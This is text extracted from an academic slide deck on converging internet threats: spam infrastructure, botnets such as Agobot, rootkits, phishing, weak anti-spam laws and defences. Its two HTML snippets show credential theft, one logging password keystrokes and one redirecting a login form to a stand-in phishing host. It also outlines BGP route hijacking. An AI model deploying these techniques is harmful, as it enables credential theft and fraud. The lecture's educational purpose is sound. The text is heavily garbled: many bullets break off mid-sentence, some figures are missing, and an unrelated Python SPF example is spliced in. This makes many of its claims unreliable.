The Convergence of Internet Security Threats (Spam, Viruses, Trojans, Phishing)
Peter Gutmann, University of Auckland
cs.auckland.ac.nz/~pgut001/pubs/blended.pdf

Convergence of Networking Technology
[Diagram: Threat: Spyware, Trojans, Phishing, ID theft]

Spam mechanisms
• Open relays
  – SORBS listed 960,000 open HTTP proxies and 1,200,000
• Pink contracts
  – Expensive, but avoid ToS
  – Spamhaus estimates that MCI Worldcom alone makes
• Gypsy accounts

procedure arms_race
  write spam_filter;
  acquire spam_filter;
  tune spam to avoid filter;
• Some spamware directly includes SpamAssassin technology to

Buy CDs with harvested addresses
• Prices vary depending on the quality
• Vacuum-cleaner for ~$50, verified for $

Send mail via spam brokers
• Handled via online forums like specialham.com,
• $1 buys 1000–5000 credits
• $1000 buys 10,000 compromised PCs
Broker handles spam distribution via open proxies, relays, compromised PCs, …
• Sending is usually done from the client’s PC using broker-
• Sources are obscured using spread-spectrum/frequency-hopping style techniques

One experiment in blocking IP addresses originating worm/virus attacks ended up blocking

Spammers can do whatever they want

They simply don’t want to know — China Telecom doesn’t care because they’re government-owned, and there is no pressure coming from the government
—Steve Linford, Spamhaus

Use BGP route injection/AS hijacking to steal an IP block
• Break into a poorly-secured router
  – NANOG 28 (June ’03) ISP security BOF: 5,400
• Send a BGP route update announcing that your router is now responsible for some currently-unused block of IP addresses
  – In 5–10 minutes the entire Internet will know
  – This is all the time you need
• Spam like crazy from each IP address in the block until you get

Spammers routinely break into legitimate users’ PCs to

“I don’t bother securing my [games] PC, because I doubt spammers are interested in my savegames”

All Granny’s going to notice is that her computer is running slowly while, unbeknownst to her, it’s blasting out spam or assisting in a denial-of-service attack
—Andrew Jaquith, Yankee Group Research Inc.
[Diagram: server, Controller, Controller]

Source code is freely available
• Well-written C++ implementation
• Cross-platform
• Modular design
• Easy to add new capabilities
Exists in many variants
• Agobot, Phatbot, Forbot, Xtrmbot, …
• Originally used IRC
• Some variants use P2P control, e.g. WASTE,

Example: Agobot (ctd)
General capabilities

Example: Agobot (ctd)
Typical Agobot commands
Harvest email addresses

Example: Agobot (ctd)
Many additional commands are available
• Macro forms of spam commands to perform the above with a
• Display spoofed pages via browser help objects (BHO’s)
• Web page redirection
• Spyware propagation
• Steal CD keys/registration codes for commercial software from
  – Includes a database of registry locations for common
• Search the hard drive for sensitive files, e.g. *.xls, *finance*

Same pattern as Agobot, but oriented more towards spying/system manipulation

Example: Haxdoor Identity-theft Trojan
Advanced anti-removal and rootkit capabilities
• Hides itself by hooking the System Service Dispatch Table
• Auto-loads via WinLogon

Example: Haxdoor Identity-theft Trojan (ctd)
Spyware capabilities
• Captures all information entered into MSIE
  – Recognises financial-site-related keywords on web pages (“bank”, “banq”, “trade”, “merchant”, …)
• Steals cached credentials (RAS, POP, IMAP, …)
• Feeds info to servers running on compromised hosts
One server held 285MB of stolen data from 9 days’
• 6.6 million entries, 39,000 distinct victim IP addresses
  – Probably much higher due to NAT’ing

Spamware Functions
Email security firm MessageLabs reports that of the spam it blocks is from infected PCs
• Much of the spam comes from ADSL/cable modem IP pools
• Distributed Server Boycott list reports 350,000 compromised

Spamware Functions (ctd)
Worms act as special-purpose spam relays (e.g. Backdoor.Hogle, MyDoom.*)
• MyDoom infected ca. 1,000,000 PCs (F-Secure)
• Infected PCs (“fresh proxies”) are traded in spammer forums
• Spamware sends either direct from end-user PCs or routed via
  – Spam comes from legitimate users or legitimate ISPs
Worms act as reverse HTTP proxies
• Provide a distributed fault-tolerant “web site” for spammers
• Backdoor.Migmaf changed the “site” every 10 minutes
  – c.f. email spam frequency-hopping

Disable anti-virus/firewall software (ProcKill, Klez, Bagle-
• At one point it was possible to scan for viruses via the standardised code that they used to disable MSAV
Bypass firewall software
• Walk the NDIS.SYS memory image or data structures and patch yourself in beneath the firewall hooks
  – Page in your own NDIS.SYS image from disk to avoid
• Many, many variations used by different rootkits, e.g.
Modify anti-virus database files to remove detection of the malware (IDEA, AntiAVP)
Re-enable unsafe defaults in software, e.g. MS Office (Listi/Kallisti)
Infect through CRC32-checksummed files (HybrisF)
• CRC32 isn’t a cryptographic checksum mechanism
• Can modify the file without affecting its CRC32 value
Install rogue CA root certificates (Marketscore)
• Because of the browser certificate trust model, Marketscore
Disable user rights verification by patching the kernel
• Two-byte patch to
Engage users in IM chat sessions inviting them to download malware (IM.Myspace04.AIM)
• The worm will tell users that it’s not malware if asked
• The typical AOL “lold00d check this out” is hardly a Turing-test level challenge
Steal CD keys/registration codes for commercial software
Add registry entries to make an ActiveX control appear “safe” and digitally signed (Grew)
Pop up messages requesting payment of money and may disable your computer if you don’t pay up (WGA)
Prevent anti-virus/malware removal programs from
• Remove registry keys
• Block apps from starting
  – Register kernel-level load image notification callback via
Use NT native API to create registry entry names that the Win32 API can’t process
Email address harvesting (several)
DDoS on spam-blockers (numerous)
Run a SOCKS proxy for spammers (BID 9182 MSIE hole)
Run port redirectors to mask the true source of traffic
Spammers can do virtually anything to a victim’s PC

Spamware with User Consent
Legitimate programs install spyware/trojans/spamware
• Users permit this via the EULA agreement
• Example: Kazaa
  – 182 screen-page licence
  – SugarCRM license is approx. 700 screen pages
  – Additional licences included by reference
  – Further documents incorporated by reference
  – Many portions are malformatted, making them difficult to
  – Disables standard Windows facilities like cut & paste to prevent it from being read more easily in a text editor
• DirectRevenue (44 screen-page licence) gives itself the right to attack and destroy other spyware on the machine
• Use OLE automation to approve the EULA automatically

Monoculture paper: Computing power is moving to the (insecure) web periphery
• Centralised vulnerable servers

Publicity virus: Written by bored script kiddies
• Poorly tested, often barely works
Spam/phishing virus: Written by paid professional
• Well-tested, can be quite sophisticated
  – The Babylonia virus used plug-in virus modules (VMODs)
  – The Hybris worm uses digitally-signed encrypted updates propagated via web servers and newsgroups

The [Scob trojan] attack demonstrated the same skills required to design an entire software application

Some malware will send back a diagnostic memory dump (à la Windows Error Reporting) if it fails to run on a particular machine configuration

The gang has been very active and worked with care on each aspect of the final product. The developers constantly improved the code with […] code optimisation and memory checks to avoid blue-screen errors

Zero-days are sold online

There are dozens of these sites with hackers offering zero-day code for sale all the time. They even have a mechanism to

Kernel-mode rootkits can be bought from third-party
• Outsourcing the anti-detection code allows malware authors to concentrate on the payload

Sony even installs a (badly-written) rootkit as part of its
• Rootkit was exploited by trojans/viruses to hide their presence
• Trying to remove it could violate the DMCA (or similar laws

Most people don’t even know what a rootkit is, so why should
—Thomas Hesse, president of Sony BMG’s global

• Around half a million computers worldwide were infected

Those are amazing infection numbers, making this one of the

Available as Bronze/Silver/Golden/Brilliant Hacker
• €150 (Bronze)/240 (Silver)/450 (Gold)/580 (Brilliant) layered
• Commercial version of Hacker Defender

Example: Hacker Defender rootkit (ctd)
Anti-virus vendors notice users performing online scans of small variations on a theme

The professionalism of these rootkits is coming to another
—Allen Schimel, StillSecure

Then organised crime moved in…
• Dutch Schultz took over from existing operators
• They weren’t career criminals and were intimidated by explicit
Dutch hired mathematician Otto “AbaDaba” Berman to fix
Once organised crime got involved, everything changed
• A trivial problem/nuisance became a major criminal enterprise

The modern spam industry now is spread across the globe and has become infested by technically organised programmers from Russia and Eastern Europe, often in league with local organised crime syndicates
—Colin Galloway, Asia Times

Most of the big outbreaks are professional operations. They are done in an organised manner from start to finish
—Mikko Hypponen, F-Secure

The bad guys are winning. They’re stealing more money, swiping more identities, wrecking more corporate computers,

Phishing: A broadly launched social engineering attack in which an electronic identity is misrepresented in an attempt to trick individuals into revealing personal credentials that can be used fraudulently against them
—Financial Services Technology Consortium

Have gone from amateurish to very sophisticated, professionally-run operations
• Phishing toolkits allow criminals to select corporate logos, web
  – eBay’s own fraud investigators were fooled by one phishing email, and endorsed it as legitimate
• Perfect copies of the original site
• Links lead back to the real site

Convince users to go to the fake site
• Promotions: $1,000 top-up for your account, reduce your home mortgage rate, win a car, …
  – Mirror existing promotional efforts by banks
• Update/verify your account information
  – May ’04: Wachovia merges with First Union (large US
  – Sends email to customers with a link for updating account
  – Wachovia’s phones started ringing off the hook…
  – December 2005, yahoo sends mail to Yahoo Mail users personal information and a credit card number…
• View your account balance
  – Wells Fargo used to regularly send out emails with embedded links that were indistinguishable from phishing
  – Chase still does this

Here is official mail from a credit card company, actively training its users to become future victims of phishing

• Visit our new, more secure web site
  – Again, this mirrors the practices of real banks
  – Chase sends out emails with embedded links exhorting customers to sign up for phishing-protection plans (!!)
  – To compound the sin, they use random third-party email
  – Chase will also honour pre-approved credit card applications that have been torn into little pieces, taped back

Financial institutions are training their users to accept phishing email

Westpac bank may use your email address to advise you of
To validate your personal Westpac online banking account follow the link below: https://westpac.com.au/validate.asphttp://

Bank emails are indistinguishable from phishing emails

Customers should understand that Citibank will never send e-mails to customers to verify personal and/or account information […] It is important you disregard and report e-mails which […] request any customer information — including your ATM PIN or account details
—Citibank Australia

and […] to identify and authenticate yourself, enter (a) your card number (b) your ATM PIN (c) your account
—Citibank Australia email, November 2006

It had all the classic signs. It was an e-mail asking the customer to go to a Web site and enter their ATM or credit card number, their ATM PIN and their account number. It then asked them to enter some answers to security questions such as their mother’s maiden name and create a username and
—Bronwyne Edwards, SMS Management & Technology

The bank couldn’t see a problem

Are you guys on crack?
—Paraphrased journalist inquiry to Citibank

These are all online banking customers and are used to receiving e-mails from us. I don’t believe we have contradicted [our security policy]
—Citibank Australia spokesperson

Financial institutions are training their users to ignore security indicators

A profusion of domain names serve to confuse users
• citibank.com = Citibank
• citibank-verify.4t.com
  – No problem to certificate for
• accountonline.com
  – Citibank uses six more domain names
Many other organisations do this
• TD Waterhouse
• United Airlines

Other Citibank-like domains
citibank-america.com, citibank-credicard.com, citibank-credit-card.com, citibank-credit-cards.com, citibank-account-updating.com, citibank-creditcard.com, citibank-loans.com, citibank-login.com, citibank-online-security.com, citibank-secure.com, citibank-site.com, citibank-sucks.com, citibank-update.com, citibank-updateinfo.com, citibank-updating.com, citibankaccount.com, citibankaccountonline.com, citibankaccounts.com, citibankaccountsonline.com,
Some are legitimate, some aren’t
• citibank-account-updating.com is supposedly owned by Ms. Evelyn Musa,
• Like virtually all similar cases, this person is an innocent victim of identity fraud
  – (Why would any rational criminal commit a crime in their own name when they can trivially use someone else’s?)

This is an endemic problem for identity-based accountability systems like domain registration and certificates

Example: Hanscom Federal Credit Union
• Home of Hanscom Air Force Base
• Uses domains www.hfcu.org, locator.hfcu.org, ask.hfcu.org,

F-Secure survey of registered domains, November 2006

SecuritySpace secure server survey shows that 58% of SSL server certificates are invalid

Even with certificates used, most users can’t tell right from
• Only 50% of experienced computer users identified Verisign as
• No users verified Saunalahden as a trusted CA (Saunalahden is
  – Web site is in Finnish, you can’t tell what it is even if you
• 81% of users identified VeriSlim as a trusted CA (VeriSlim
• 84% identified Visa as a trusted CA (Visa is a credit card
• 22% of
  – An informal survey of non-experienced users indicates that
• Only 24% of users could tell a spoofed HTTP amazon.com

Phishers have started using self-signed certificates and similar techniques to fool users (“secured phishing”)

In self-signing, you become your own CA […] most people don’t know that self-signed certificates exist
—Susan Larson, Surfcontrol

• Security firm Netcraft recorded 450 cases of secured phishing in 2005, the first year that records were kept
  – Self-signed certs
  – Certs for soundalike domains
  – Cross-site scripting to insert content into banking web sites
  – Frame injection to "
• Many bank sites (e.g. MasterCard, Barclays) are insecurely coded and allow these types of attack

Example secured phishing site: visa-secure.com
• Uses phishing email from visa.com to send users to the site
• The real Visa uses similar naming, e.g.
• Site uses an SSL certificate to “authenticate” itself

We use advanced SSL encryption technology to ensure confidential information cannot be viewed, intercepted, or
—visa-secure.com phishing site

• Site is (was) hosted in Taiwan

Consumers underestimate the threat
• Sept/Oct 2004 AOL survey examined 329 home computers
• 70% of users believed they were safe
• 85% had antivirus software
  – 67% of it was out of date

A large proportion of [virus-infected] systems had some form of Norton AV installed, and EVERY SINGLE ONE had a virus subscription which had lapsed. Entirely useless in protecting those
—Slashdot

• AusCERT study in 2006 found that the most popular anti-virus

I had a class full of students this semester […] the second assignment was to write a virus that would pass the anti-virus software, and all of them did by the following week
—Matt Blaze, 2004 Security Protocols workshop

One customer had over 3000 instances of some 30 or 40 viruses on her computer, some of which required some

People expect Hollywood-style effects from malware
• Exploding panels
• Sparks flying from the case
• Crashing alien spacecraft
Modern malware is designed to be as undetectable as
• No visible effect

I ran this Anna Kournikova thing and nothing happened. Why
—Anti-virus vendor support call

80% of surveyed users were infected with adware and
Most consumers believe that the threat is less than it is and

Geek-speak confuses users
• AOL UK survey found that 84% of users had no idea what
• 39% knew what a trojan was (in the US it’s a condom brand)
• Only 25% knew what spyware was
  – 10% of those thought it was for keeping an eye on your

Attacker controls the DNS
• Server compromise
  – 10% of DNS servers scanned in late 2005 were vulnerable
  – Used in one attack to redirect visitors to spyware sites
• Bribing/blackmailing ISPs
• Virus changes the victim’s DNS server entries (“pharming”)
  – Can be used to disable security updates
  – (Fake) windowsupdate.com: Your system is up to date and
• Script in phishing email rewrites the victim’s
  – As for direct DNS compromise
• Many DNS providers ignore TTLs
  – Invalid DNS entries can take weeks to correct

Trojans control the victim’s PC
• Sniff keystrokes, mouse clicks, images of graphical “virtual
• Render copies of genuine bank pages from the browser cache
Trojan installs itself as a browser help object (BHO)
• Watches for access to a who’s who of banking sites around the

Use typo-squatting to install malware
• googkle.com infects visitors with trojans, backdoors, and
• Popups redirect to third-party sites loaded with downloader
• Use assorted exploits to download more tools containing
• Just one of these downloaded exploit packages contains two backdoors, two trojan droppers, a proxy trojan, a spyware trojan, and a further trojan downloader
• Another trojan dropper infects the Windows system folder and file to prevent access to anti-virus sites
• Another generates a fake virus alert and directs the user to

Fake out standard Windows dialog boxes
• “Your computer clock may be wrong, click here”
• “Your computers is vulnerable to attack, click here” (!!)
Example: Glieder trojan
Phase 1, multiple fast-deploying variants sneak past AV software before virus signatures can be propagated
• Disable Windows XP Firewall and Security Center
Phase 2, connects to a list of URLs to download Fantibag
• Disables anti-virus software and other protection mechanisms
• Blocks access to anti-virus vendors
• Blocks access to Windows Update
Phase 3, Mitglieder malware contains the actual payload

Example: Hybris worm
Plug-in modules were encrypted with XTEA and digitally signed with a 1024-bit RSA key
• Modules were obtained from web sites or newsgroups
Modules (‘muazzins’) included
• Windows help file infector
• Polymorphic Windows executable infector
  – Could also infect executables ‘through’ a
• DOS .EXE infector
• RAR/ZIP/ARJ infector
• Word, Excel infectors
• SubSeven backdoor dropper

Example: Hybris worm (ctd)

Spyware via the affiliate model
• Pay others to infect users with spyware/adware/trojans
• iframedollars.biz pays webmasters 6 cents for each
• Their exploit drops at least 9 pieces of malware, including backdoors, trojans, spyware, and adware
Piggyback malware on legitimate software
• CoolWebSearch co-installs a mail zombie and a keystroke
• Gathers credit card numbers, social security numbers,

Use a web site’s ability to control the browser to spoof the
• Infinite spoofing variants possible
  – Intercept the
  – Move the window the mouse is over (generating the “drag”)
  – Permit the click to continue to the
  – Result is a drag-and-drop of anything on the local system to
• Overlay a minimal data-entry window over the real site’s login
  – This trick was used to attack Citibank
• Use Javascript keyboard monitoring to grab plaintext

    <input type="hidden" name="phishing" value="">
    <input type="password" name="password" onKeyPress="this.form.phishing.value += String.fromCharCode(event.keyCode);">

• Use domain rewriting to send a login elsewhere

    <form action="http://www.bankofamerica.com">
    <input type="password" name="password">
    <input type="submit" value="submit" onClick='this.form.action = "http://www.phishing.com"'>

• Infinite variants possible
  – Create a mock password field that echoes ‘*’s and stashes
  – Create a mock password field as above that submits each keystroke as it’s entered to a phishing site
Mozilla via its XUL UI is probably no more secure than IE

Core Wars in the UI
• Phishers and developers battling it out in the user interface

Example: Grams e-gold siphoner
Invades the victim’s PC via the usual attack vectors
Uses OLE automation to spoof the user’s actions
• Uses the interface
• Checks for accesses to
• After user has logged on, uses to copy the account balance
• Uses

Example: Grams e-gold siphoner (ctd)
Attacker uses the computing infrastructure to fool the victim into thinking they’re doing A when they’re doing
• Infrastructure is working exactly as
• No overt compromise is necessary (although it can help)
• c.f. vase vs. two faces trompe l’oeil

Give a man a fish and he eats for a day

Anti-virus firm MailFrontier reports that
• 28% of test subjects fell for phishing email
• 20% regarded genuine email confirming a purchase as fake

Many users are defaulting to not trusting any message that seems to be from one of the institutions they do business with. This inability to communicate with customers is a denial of service attack unlike any we’ve ever seen before
—Paul Judge, CTO, Ciphertrust

Users are overwhelmed with passwords
• InfoSecurity Europe survey found that office workers averaged
• Were required to change them daily, monthly, or quarterly
  – No study has ever shown any value in forced password
  – Forced frequent password changes = equivalent of a dog turning around three times before lying down
  – Extensive (anecdotal) evidence shows that it harms security
• People wrote passwords on public whiteboards (“I think they rub it off before the cleaners arrive”), use sports teams + date,

Even blatant social engineering will work
• 71% of users revealed their passwords (directly or indirectly) in exchange for a chocolate easter egg + social engineering
• Example: Stated that password = favourite sports team + date, then later mentioned the sports team
“Live phishing” experiment in Central Park, NY
• Give people a t-shirt for filling out a survey
• 70% divulged their MMN
• 90% revealed their place and date of birth

• Generate a response for the user to transmit to the server
• Provides mutual authentication of both parties
  – No user credentials are sent until the server has been
• Even RSA Data Security, the creators of Verisign, are now

The proper course is for the computer industry to create a

The most elegant solution has the token read the server information from the computer screen
• Hold the token up to the indicated area on the monitor

Watch for a flood of referrals to your site from an unknown
• Doesn’t work when virtual servers are being used
Don’t send customers mail with links to click on
• “Visit our home page and follow the XYZ link”
• This will drive your sales guys nuts…
Don’t allow users to open accounts or change their address
• Require paper mail communication / person-to-person

Phishing Defences (ctd)
Don’t use popups to obtain data from users
• Standard legit-site spoofing technique used by phishers
• MasterCard SecureCode uses a popup to obtain extra PIN data
Use a two-phase login
• First page (HTTP) asks for the user’s name
• Second page (HTTPS) asks for the user’s password
  – Decorate the second, password page with user-specific
  – Train users to be suspicious if this information isn’t
• Almost all non-US banks do this
• The majority of US banks

Phishing Defences (ctd)
Perform mutual authentication of both parties
• Challenge-response mechanism authenticates users

Phishing Defences (ctd)
Use a PwdHash-style mechanism to create per-site unique
• Hashes a user password, site ID, and nonce
• Ensures that
  – Each site has a different (hashed) password
  – No site ever knows the user’s actual password
Maintain a client-side history of sites accessed via SSL
• Warn the user if they’re accessing a new domain

Phishing Defences (ctd)
Warn users when certificates from rarely-used CAs are
• Browsers, mailers contain over 100 built-in CAs, many of

Phishing Defences (ctd)
Require out-of-band verification if floor limits for unusual transactions are exceeded
• “Ah, our customer must be travelling in Nigeria and wanting to transfer all his money to a bank in Anguilla at 3 o’clock in the
• (If you’re travelling to an obscure country, try withdrawing money from there and see if your bank checks up on you)
Require customers to explicitly enable remote access as they do for cellphone roaming
• Just a simple measure like a call to or from an account holder’s number will defeat remote attackers

Phishing Defences (ctd)
Don’t tie authorisation to obvious identifiers like SSNs

Balance is strongly tilted in favour of the bad guys

In a recent survey, 31% of online shoppers said they were buying less than before because of security issues
—LA Times

6% of consumers (12 million) have changed banks and 18% (39 million) have stopped shopping online due to concerns that their personal information will be stolen [...] nearly half of consumers would be willing to switch their accounts to financial institutions they perceived as having stronger theft

Even if no actual fraud occurs, consumer suspicion of legitimate online interactions […] far outweigh the direct costs [of phishing] to financial institutions
—Financial Services Technology Consortium

The economics of online fraud are so much in favour of the criminals that, at least for now, a continued increase in phishing activity is all but certain
—Brian Krebs, Washington Post

• CSO Magazine has a 19-page article “How a Bookmaker and a Whiz Kid Took On an Extortionist — and Won” on the 9-month, $1M battle it took to bring down a single online

You can call me spam queen, I don’t really care. As long as I’m not breaking any laws, you don’t have to love me or like

What is spam?
• “I’ll know it when I see it”
Defining spam also (implicitly) defines non-spam
• Spammers will alter spam to qualify as non-spam
• Legislation will (inadvertently)
The same problem was encountered with spyware definition attempts
• Consistent definitions allowed spyware vendors to work within
US corporates are experts at end-runs around opt-in
• “We won’t sell your details to third parties
  – Rent or exchange them
• Medical insurers: “Sign this unlimited waiver or go elsewhere for medical care”

Spammer-endorsed spam legislation
• You know this one’s going to be good…
• Spam volume
Rushed through Congress in a hurry to pre-empt California’s strict opt-in law before it took effect on 1
All of the law’s provisions are trivially circumvented
Use non-promotional content to classify your spam as non-
BUY V1AGRA NOW!
Provide (invalid) unsubscribe link
• Spammers don’t care about unsubscribe mechanisms, you’re
Many variations of unsubscribe trickery exist
Register the domain name 6 hours after sending the spam and shut it down after another 12 hours
• Spam is sent late at night, domain goes live in morning
• Minimises exposure, doesn’t use a spoofed address
• Wreaks havoc on DNS servers as MTAs continue to look up
At best the CAN-SPAM features are completely ineffective
• At worst they aid the spammers (unsubscribe trickery)
Compliance with CAN-SPAM
• January 2004
• April 2004
• June 2004
• August 2004
In 2008, after reviewing comments submitted three years earlier, the FTC revised CAN-SPAM to make it even more ineffective…
• Makes opt-out almost impossible for consumers
Also known as the I-CAN-SPAM Act
• First prosecution, of “Phoenix Avatar”, didn’t occur until a full year after the act was passed
• Spammer was given a suspended sentence and barred from
• First conviction wasn’t until 2007,
  – Offender was also convicted of wire fraud, witness
National legislation pre-empts stricter state legislation
• Its main effect is to legitimise spam designed to exploit it
  – Florida Attorney General used it to spam Floridians during
  – Fourth Circuit Court of Appeals ruled that it negated state
• High-profile initial prosecutions will encourage pseudo-compliance to avoid further prosecutions
  – Like antibiotics creating super-bugs
  – Actually it isn’t even encouraging pseudo-compliance…

CAN-SPAM is a toothless tiger that nullifies most aspects of every state’s anti-spam legislation and leaves spam victims without meaningful legal recourse
—Dan Appelman, Heller Ehrman, White & McAuliffe, LLC

Example of CAN-SPAM in action
• AOL employee Jason Smathers steals 92 million email
• Theft was carried out using another AOL employee’s access
• Smathers sells the addresses to spammers for $100,000
• Pleads guilty to this in court
  – The judge had had to close his own AOL account because
• None of this was considered a crime under CAN-SPAM

I’m not prepared to go ahead […] I need to be satisfied that a crime has been created [sic]
—Judge Alvin Hellerstein, Manhattan federal court

Attempts to do an end-run around I-CAN-SPAM by prosecuting offenders using other legislation
• Sotelo v. DirectRevenue claimed trespass to chattels by a
• Court ruled that “interference” (rather than explicit damage)

Spyware interfered with and damaged [the plaintiff’s] personal

UK Spam Legislation (ctd)
In the UK, phishing sites are protected by the Computer
• Daniel Cuthbert, security consultant at ABN Amro, makes a
• Site looks somewhat suspicious, so he checks a few other pages on the site to make sure that it’s not a phishing site
• This triggers an IDS at British Telecom

UK Spam Legislation (ctd)
• Cuthbert is prosecuted, convicted, fined, and loses his job

We welcome today’s verdict in a case which fully tested the computer crime legislation and hope it sends a reassuring message to the general public

UK Spam Legislation (ctd)
In further news, the UK government is proud of the fact
Each prosecution is reported in the media
• They’re so rare that they’re newsworthy
Australia’s first prosecution took two years after the law
• Like the US and UK, Australia’s anti-spam law is very weak,

Everyone would have to upgrade to modern email clients
Requires a global secure access control mechanism
Closed communities
• Refuse to accept mail from someone you don’t know
You don’t exist, go away
• Need to predict in advance everyone who’ll ever send mail to
  – Change of address
  – Using someone else’s PC to send mail
  – Sales inquiry
Prevents use of (outright) forged addresses
• Various proposals exist
  – Designated Mailers Protocol (DMP)
  – Reverse Mail Exchanger (RMX)
  – Sender Permitted From/Sender Policy Framework (SPF)
Attempts to implement this in practice have had limited
Technical problems
• Other proposals used path authentication (server to server)
  – Handled by (usually) well-managed servers
• SPF used message authentication (end-user to end-user)
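The SPF check named above, as an added example that is not part of the original slides: a minimal evaluator run over constructed DNS data instead of live lookups. It also makes the mechanism's limit concrete: a pass only says the sending host is authorised for the envelope-sender domain, which any sender can arrange for a domain of their own. All domains, records and addresses are made up; prefix lengths, macros and redirect= are not handled.

```python
"""Minimal SPF evaluator (added example, not from the slides).

SPF lets a domain publish, in a DNS TXT record, the hosts allowed to send
mail with that domain as the envelope sender.  This evaluator checks a
sending IP against constructed SPF/A/MX data instead of live DNS, handles
the ip4, a, mx, include and all mechanisms (prefix lengths, macros and
redirect= are left out), and shows what an SPF verdict does and does not say.
All domains, records and addresses below are made up for the demo.
"""
import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

# Constructed DNS data standing in for TXT, A and MX lookups.
SPF_RECORDS = {
    "bank.example":    "v=spf1 ip4:203.0.113.0/24 mx -all",
    "spammer.example": "v=spf1 ip4:198.51.100.0/24 ~all",
    "relay.example":   "v=spf1 ip4:192.0.2.0/24 -all",
    "corp.example":    "v=spf1 a include:relay.example ?all",
}
A_RECORDS = {"corp.example": ["192.0.2.10"], "mail.bank.example": ["198.18.0.5"]}
MX_RECORDS = {"bank.example": ["mail.bank.example"]}


def check_spf(ip, domain, depth=0):
    """Return the SPF result ('pass', 'fail', 'softfail', 'neutral', 'none',
    'permerror') for `ip` sending mail as `domain`."""
    if depth > 10:                        # include: recursion guard
        return "permerror"
    record = SPF_RECORDS.get(domain)
    if record is None:
        return "none"
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    addr = ipaddress.ip_address(ip)
    ip_str = str(addr)                    # normalised form for A-record compares
    for term in terms[1:]:
        qualifier = "+"                   # an unqualified mechanism means pass
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.lower().partition(":")
        if mech == "all":
            matched = True
        elif mech == "ip4":
            matched = (addr.version == 4
                       and addr in ipaddress.ip_network(arg, strict=False))
        elif mech == "a":                 # A record of the named (or current) domain
            matched = ip_str in A_RECORDS.get(arg or domain, [])
        elif mech == "mx":                # A records of the domain's mail exchangers
            matched = any(ip_str in A_RECORDS.get(mx, [])
                          for mx in MX_RECORDS.get(arg or domain, []))
        elif mech == "include":           # matches only if the included record passes
            matched = check_spf(ip, arg, depth + 1) == "pass"
        else:
            return "permerror"            # mechanism or modifier not supported here
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                      # no mechanism matched


def check_envelope(ip, mail_from):
    """Evaluate a message's envelope sender; returns (domain, spf_result)."""
    domain = mail_from.rpartition("@")[2].lower()
    return domain, check_spf(ip, domain)
```

With these records a host in 198.51.100.0/24 fails when it forges bank.example but passes when it sends as spammer.example, so a pass by itself is no evidence that the mail is wanted.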
We were both wrong…
• Spammers are adopting SPF faster than legitimate users
– More spam (12%) passes SPF checks than legitimate email
• It failed in negative time!
– SpamAssassin weights messages from SPF hosts with a -0.001 score because of its negligible value in controlling
The work [is] an excellent example of how to not design security

Spam is effective because it’s free
• To make it less effective, make it non-free
• Sender: I have some mail for you
• Receiver: Please submit the solution to the following problem
– Receiver computes in O(1) time
– Sender computes in O(1000) time
• Receiver-controlled rate limiting
• Sender pays in CPU time to send mail

Only works if everyone does it
• The fax machine effect
• Need to convince sendmail, Microsoft, qmail, Postfix to
– Others would be forced to follow
Who manages the billing?
• 15 years of work on micropayments haven’t produced any (practically) useful results
Breaks mailing lists
• Use white-lists for trusted partners
• Drop unpaid mail into quarantine
Discriminates against low-powered clients
• A few seconds on a 3GHz P4 is an hour on a PalmPilot
Proof of resource consumption just wastes resources
• Cycles should be applied usefully
– Bread Pudding Protocol is a proposal to do this
hate paying for email
• Email is effective because it’s free
• There’s a reason why everyone uses email and not Telex, EDI,
In practice it doesn’t work

Limits the damage caused by compromised hosts
• Limit outgoing connections to 0.5–1 connection per second
– Code Red ran at 200 cps
– SQL Slammer peaked at 30,000(!!) pps (using UDP)
• Suspend programs that make too many connections at too high
Variations on throttling mechanisms
• Rate of failed connections (catches random address probing)
• Rate of first-contact connections (doesn’t penalise repeated
• Connections not preceded by DNS lookups (catches probing)
• Electronic equivalent of a firebreak: You’ll never be able to prevent the problem, but you can at least limit the damage
• MSIE was 5 years behind everyone else in supporting ad
• Adding virus throttling would be an admission that Windows is
Requires special-case handling for P2P software
• Most P2P apps rely on opening connections to many peers at
• Many peers are offline/unreachable

Termination of spammers pour discourager les autres has been proposed at various times
• Russia’s most notorious spammer, Vardan Kushnir, was beaten to death with a heavy object in his apartment
• Some of the news headlines
“Ignoble Death Becomes Russia’s Top Spammer”

VoIP Spam
VoIP Spam (ctd)
Use humans to make the calls
• Cheap labour in India, Pakistan, …
• Cheap phone calls via VoIP
• Companies can’t block these calls without jeopardising their
– Common carrier = allow nondiscriminatory use in exchange for liability protection for misuse
VoIP Spam (ctd)
VoIP mail boxes dutifully record every message that they
• Humans will hang up within seconds
• VoIP providers will need to massively expand storage to store VoIP voicemail spam
Instant Messaging spam (spim)
SMS/text messaging spam

Current situation can only be addressed via legislation
• Neither users nor vendors have any natural incentive to fix
[Timeline figure: –10 yrs, –5 yrs, legislation; labelled “Proxy spam”]
Spam comes from legitimate (if unwitting) users
Spammers operate from jurisdictions (logical and/or physical) where prosecution is unlikely/impossible
Going after the spammers directly is unlikely to be effective
Prosecution requires evidence, plaintiff, defendant
• Plaintiff = everyone with an email address
• Defendant = unknown
Solution to the threat is to address inadvertent spamming via legitimate users (open proxies, compromised hosts,
Most spam is sent via unauthorised channels
• The dress-code-for-bank-robbers legislative approach will
Pass legislation to close the unauthorised channels

Today’s dumb-terminal equivalent is more capable than the departmental server of 10 years ago
• 90% of them are used as little more than dumb terminals
Example: “Blaster Revisited”, ACM Queue magazine
• The task: Electricity-bill payment terminal
– Enter name, address, amount, hit Enter
Windows OK (Bill Cheswick)
• Browses the web
• Sends/reads email
• Arranges photos and music
• Nothing else
Can’t use Outlook or MSIE (1
Unlikely to pass in the US due to software industry
• Would require an Enron-style debacle to pass
This is a social problem that can’t be fixed using
• Technical solutions are a band-aid on a sucking chest wound
No solution in sight
• Just have to treat it like traffic jams, it’s just a cost of the
ISPs should close port 25 (and 587, and others) by default

Convince consumers that it’s safe to buy online
• SSL protects credit cards in transit
• If you see the padlock, you’re safe
Security theatre
• Vendors put padlock GIFs on their web sites to provide extra reassurance
– Of the 50 largest US banks, 49 use padlock pictures to
• Protects (in theory) against a man-in-the-middle attack
– Zero recorded instances in 10 years of online credit card use
• No protection for cards once they’re at the merchant’s server

Crooks obtain user credit card/banking information through various means…
Breaking into poorly-secured servers
• Large-scale, tens to hundreds of thousands of cards collected
Phishing/social engineering
• Medium-scale, more effort required but can collect more
